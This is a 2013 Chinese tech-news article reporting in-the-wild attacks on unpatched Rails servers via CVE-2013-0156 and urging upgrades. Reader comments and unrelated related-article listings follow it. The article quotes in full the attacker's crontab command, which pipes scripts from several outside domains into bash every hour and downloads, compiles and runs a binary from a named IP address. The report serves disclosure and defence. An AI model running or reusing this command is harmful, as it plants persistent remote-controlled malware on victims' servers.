阅读更多

1顶
0踩

编程语言

原创新闻 Rails 老漏洞仍在肆虐,请尽快升级

2013-05-30 12:46 by 副主编 wangguo 评论(4) 有10405人浏览
安全专家Jarmoc在博客中称,过去几天,一些基于Rails的Web应用程序和服务器遭到了攻击,攻击者成功入侵后,会在服务器上安装一个机器人,以接受来自IRC频道的进一步指示。

攻击者利用的是CVE-2013-0156这个安全漏洞,尽管Rails团队已经在今年1月份修复了该漏洞,但目前还有大量的服务器未更新至最新的版本,使得攻击者有机可乘。

该漏洞存在于Action Pack模块的参数解析代码中,允许攻击者绕过认证系统,注入并执行任意SQL代码,或对Rails应用执行DoS攻击。新的Rails版本中已经修复了该漏洞。

攻击者试图在crontab中添加如下命令(现在该命令已不可用):

crontab -r; echo \"1 * * * * wget -O - colkolduld.com/cmd1|bash;wget -O - lochjol.com/cmd2|bash;wget  -O - ddos.cat.com/cmd3|bash;\"|crontab -;wget http://88.198.20.247/k.c -O /tmp/k.c; gcc -o /tmp/k /tmp/k.c; chmod +x /tmp/k; /tmp/k||wget http://88.198.20.247/k -O /tmp/k && chmod +x /tmp/k && /tmp/k


该命令执行后会下载名为cmd1、cmd2和cmd3的可执行文件,并下载一个名为k.c的C源码文件到/tmp目录中,使用系统的GCC编译执行。或许是为了防止编译失败,该条命令还将下载一个预编译的k版本。

Jarmoc在博客中公布了k.c的源码,感兴趣的开发者可点击这里

目前最新的Rails版本为3.2.13、3.1.12和2.3.18,建议开发者尽快升级。

Via jarmoc
1
0
评论 共 4 条 请登录后发表评论
4 楼 wujingtianze 2013-06-05 09:43
redis?
3 楼 it90ceo 2013-06-02 09:36
支持下。。。
2 楼 lection.yu 2013-05-31 10:53
黑客高人真多。。
1 楼 7y4z2008 2013-05-31 08:43
地下0day市场更多

发表评论

您还没有登录,请您登录后再发表评论

相关推荐

  • java数据透视表_使用java如何操作excel数据透视表

    支持楼上,jxl可以。... int getNumberOfSheets()获得工作薄(Workbook)中工作表(Sheet)的个数,示例:jxl.Workbook rwb = jxl.Workbook.getWorkbook(new File(sourcefile));int sheets = rwb.getNumberOfSheets...

  • java数据透视表_Java 创建 Excel 数据透视表

    Excel 数据透视表具有强大的...本文将介绍如何在Java应用程序中创建Excel数据透视表及设置透视表的格式。Jar文件导入方法方法一:下载最新的 Free Spire. XLS for Java 包并解压缩 , 然后从lib文件夹下, 将 Spir...

  • java excel 透视_在Java中用Excel创建数据透视表和数据透视图

    当您需要快速分析Excel工作表中的数据并查看数据中的比较,...在本文中,我将介绍如何使用Free Spire.XLS for Java API在Java中的Excel文件中创建数据透视表和数据透视图。添加依赖项首先,您需要添加所需的依赖项,...

  • java 数据透视表 组件_Java创建Excel数据透视表

    正版现货excel效率手册早做完不锡22.82元包邮(需用券)去购买 >Excel 数据透视表具有强大的数据...本文将介绍如何在Java应用程序中创建Excel数据透视表及设置透视表的格式。使用工具: Free Spire. XLS for Java (...

  • java excel 透视_Java Excel透视表相关操作实现代码

    概述透视表是依据已有数据源来创建的交互式表格,我们可在excel中创建透视表,也可编辑已有透视表。所需工具:Free Spire.XLS for Java免费版,编辑代码前,先下载导入jar到Java程序(可手动下载导入,或通过Maven...

  • 如何使用Java以编程方式在Excel中创建数据透视表?

    Excel电子表格中的数据透视表用于以交互方式汇总数据。假设在工作表中有许多发票...为了使用Excel数据透视表,我们将使用Aspose.Cells for Java,它是一个功能强大的API,可让您从Java应用程序内部生成,修改和转换Exc

  • java数据透视表算法_用Java Steams创建数据透视表

    【51CTO.com快译】这次让我们来看看如何使用Java 8 Streams(流)来实现一张数据透视表。通常情况下,原始数据本身一般并不容易被人们所读懂,因此我们需要进行一些数据聚合操作来辨别出原始数据中的各种规律模式。而...

  • java excel 透视_java基于poi导出excel透视表代码实例

    这篇文章主要介绍了java基于poi导出excel透视表代码实例,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下从前,我是一个前端程序猿,怀着对打通任(前)督(后)二...

  • java excel 透视_JAVA操作Excel创建透视表

    Free Spire.XLS for Java,作者使用的是免费版。可去官网下载Jar包后解压,将解压后lib文件夹下的Spire.Xls.jar手动导入到Java程序;或者通过Maven仓库下载导入。JAVA程序代码如下importcom.sp...

  • java poi 数据透视,Apache的POI:Excel数据透视表 - 行标签

    I have a requirement to create a excel sheet in JAVA as below :I am not able to create a row label with multiple columns side by side ( menus and submenus filter ).Instead of displaying the submenu in...

  • 手把手教你如何在Java在Excel中进行数据分析

    前一段时间淘宝出了一个“淘宝人生”的模块,可以看从注册淘宝账号至今的消费记录,仔细想了想,现在微信、淘宝这些APP好像都喜欢出这种记录使用者的支付、消费情况的功能。

  • excel 宏 数据透视表_宏从多个文件创建Excel数据透视表

    excel 宏 数据透视表 宏从多个文件创建Excel数据透视表 (Macro Creates Excel Pivot Table From Multiple Files) If you want to create a pivot table from data on different worksheets, you can use a Multiple ...

  • excel数据透视表_Excel数据透视表排序问题

    excel数据透视表 Excel数据透视表排序问题 (Excel Pivot Table Sorting Problems) Usually, it's easy to sort an Excel pivot table – just click the drop down arrow in a pivot table heading, and select one ...

  • excel数据透视表_Excel数据透视表选择快速提示

    excel数据透视表 Excel数据透视表选择快速提示 (Excel Pivot Table Selection Quick Tip)To format a pivot table, you can select a specific section, such as one of the fields, or a grand total. When you ...

  • java excel 透视,Java开源库生成数据透视表excel

    Given an excel file I want to generate a pivot table programmatically. I have heard of Aspose.Cells but it is paid version. Can someone suggest some open source libraries similar to Aspose.Cells or at...

  • java刷新透视表数据源,Java 创建、刷新Excel透视表/设置透视表行折叠、展开

    Java 创建、刷新Excel透视表/设置透视表行折叠、展开透视表是依据已有数据源来创建的交互式表格,我们可在excel中创建透视表,也可编辑已有透视表。本文以创建透视表、刷新透视表以及设置透视表的行展开或折叠为例,...

  • (源码)基于 Koa2 的 FEBLOG API.zip

    # 基于 Koa2 的 FEBLOG API ## 项目简介 FEBLOG API 是一个基于 Node.js 和 Koa2 框架的 RESTful API 服务器,支持多种关系型数据库(如 PostgreSQL、MySQL、MariaDB、SQLite、MSSQL),并使用 Sequelize 作为 ORM。项目支持跨域请求、JSON 数据传输、JWT 身份认证等功能,适用于构建前后端分离的应用。 ## 主要特性和功能 跨域支持通过配置支持跨域请求。 数据传输格式支持 applicationxwwwformurlencoded、multipartformdata、applicationjson 格式的 POST、PUT、DELETE 请求。 JWT 身份认证通过 JWT 实现用户身份认证。 数据库支持使用 Sequelize ORM 支持 PostgreSQL、MySQL、MariaDB、SQLite、MSSQL 等多种数据库。

  • 存储器实验资料.zip

    存储器实验资料.zip

  • (源码)基于 Python 的知乎热榜爬虫及数据处理项目.zip

    # 基于 Python 的知乎热榜爬虫及数据处理项目 ## 项目简介 本项目基于 Python 编程语言,旨在实现知乎热榜的定时跟踪以及相关数据的存储与查询操作。通过爬虫技术获取知乎热榜问题的详细信息,将数据存入数据库,同时提供一系列 SQL 查询示例帮助用户熟悉 SQL 基本语法,还包含使用 Selenium 实现 GPA 计算器的功能。 ## 项目的主要特性和功能 1. 知乎热榜爬虫定期爬取知乎热榜,获取问题摘要、描述、热度、访问人数、回答数量等基本信息,并将数据存入数据库。 2. 可定制爬虫逻辑用户可以选择删除已有代码从零开始编写,也可以完成代码填空实现相应功能。 3. GPA 计算器使用 Selenium 模拟点击登录 WebVPN,登录 info 并访问成绩单页面,查询成绩并计算每学期的绩点。 4. SQL 练习提供一系列基于 MySQL 数据库的 SQL 查询练习,帮助用户熟悉基本的 SQL 语法,如添加新列、数据填充、关键词查询等。

  • (源码)基于C语言的学生信息管理系统.zip

    # 基于C语言的学生信息管理系统 ## 项目简介 这是一个基于文本界面的学生信息管理系统,旨在通过简单的文本输入实现学生信息的添加、查找、修改和删除操作。系统采用链表数据结构存储学生信息,并支持文件读写功能以持久化存储数据。 ## 项目的主要特性和功能 ### 主要特性 1. 文本界面操作用户通过控制台输入指令完成操作。 2. 链表数据结构使用链表存储学生信息,方便信息的添加和删除。 3. 文件操作支持将学生信息数据保存到文件,以及从文件中读取数据。 ### 功能详解 登录验证用户需输入正确的学号和密码才能进入系统。 主界面展示显示系统主菜单,包括学生信息查找、删除、添加、修改和录入等功能。 学生信息查找根据学号查找学生信息。 学生信息删除根据学号删除学生信息。 学生信息添加可以添加新的学生信息到系统中。 学生信息修改可以修改已存在的学生信息。 学生信息录入展示所有存储的学生信息。 辅助功能

Global site tag (gtag.js) - Google Analytics